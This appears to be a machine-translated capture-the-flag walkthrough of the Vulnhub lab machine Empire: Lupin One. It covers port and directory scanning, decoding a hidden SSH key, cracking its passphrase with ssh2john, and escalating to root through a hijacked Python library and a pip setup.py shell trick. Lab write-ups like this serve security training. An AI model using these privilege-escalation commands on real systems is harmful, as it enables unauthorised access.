Vulnhub target machine Emplre: Lupinone penetration test detailed explanation
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides a variety of vulnerability platforms. It can be downloaded from a variety of virtual machines, and the local VM can be opened. It is like playing a game to complete interesting combats such as penetration testing, privilege escalation, vulnerability exploitation, and code auditing.
This is a vulnerability target drone, just need to find the flag as usual.
Difficulty:Medium
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip
Vulnhub target machine installation:
After downloading, unzip the installation package and open it with VMware.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
kali
use arp-scan -l
or netdiscover
discover hosts
PS: In fact, the ip is given when it is opened. If it is not given, you need to scan
the penetration machine: kali IP: 172.16.5.140 target machine IP: 172.16.5.179
Use the command:
nmap -sS -sV -T4 -n -p- 172.16.5.179
Use the command:
nmap -p22,80 -sC -sV 172.16.5.179
#You can try script scanning
Visit 80
the port. There is a picture, and 80
the port is scanned as usual: dirb、dirsearch、whatweb、gobuster
wait for robots.txt
the file to be found
There is no information to use, perform a deep scan and use wfuzz
blur to detect it
wfuzz -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://172.16.5.179/\~FUZZ
You can get an account name: icex64
then you need the private key to log in and it's hidden somewhere!
Then continue to scan to find /~secret/.mysecret.txt
the file, you can know that this string isBase58编码
Online Base58
decoding: http://www.hiencode.com/base58w.html
②: SSH private key blasting login:
Here you know the account number but don’t know the password, you can use it ssh2john
to crack it. Use fasttrack
this dictionary to get the password:P@55w0rd!
Then give permission 600
, otherwise you will not be able to log in chomd 600 key
, then try to log in and log in successfully! !
、
③: pip rights promotion:
sudo -l
Display the commands that the current sudo
user can execute
witharsene
heist.py
python3.9
Find webbrowser.py vi
the editor webbrowser.py
(with write permission) in the directory to add, os.system("/bin/bash")
save and exit
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
Now that you have got arsene
the user permission, check the command that can execute the permission sudo -l
again sudo
, and found that pip
the permission is raised (the first time you don’t know how to use it, just learn it)
GTFOBins
Find it directly : https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
So far, the flag has been obtained, and the penetration of this article is over. Thank you for watching! !
Vulnhub target penetration summary:
The difficulty of this target machine is moderate
1. Information collection arp-scan -l
Obtain ip address and port information web
Scanning tool: nikto,dirb,dirbuster,whatweb
wait to view F12
the source code information'
2. Base58
Encoding ssh2john
tools must use blasting ssh
passwords
3. SSH
Private key login permissions must be given 600
, otherwise an error will be reported
4. pip
Privilege escalation ( first use)
Emplre
The two articles are over! In the end, it is not easy to create. I hope it will be helpful to everyone. If you like it, please give me a one-click triple link. Your happiness is my greatest happiness! !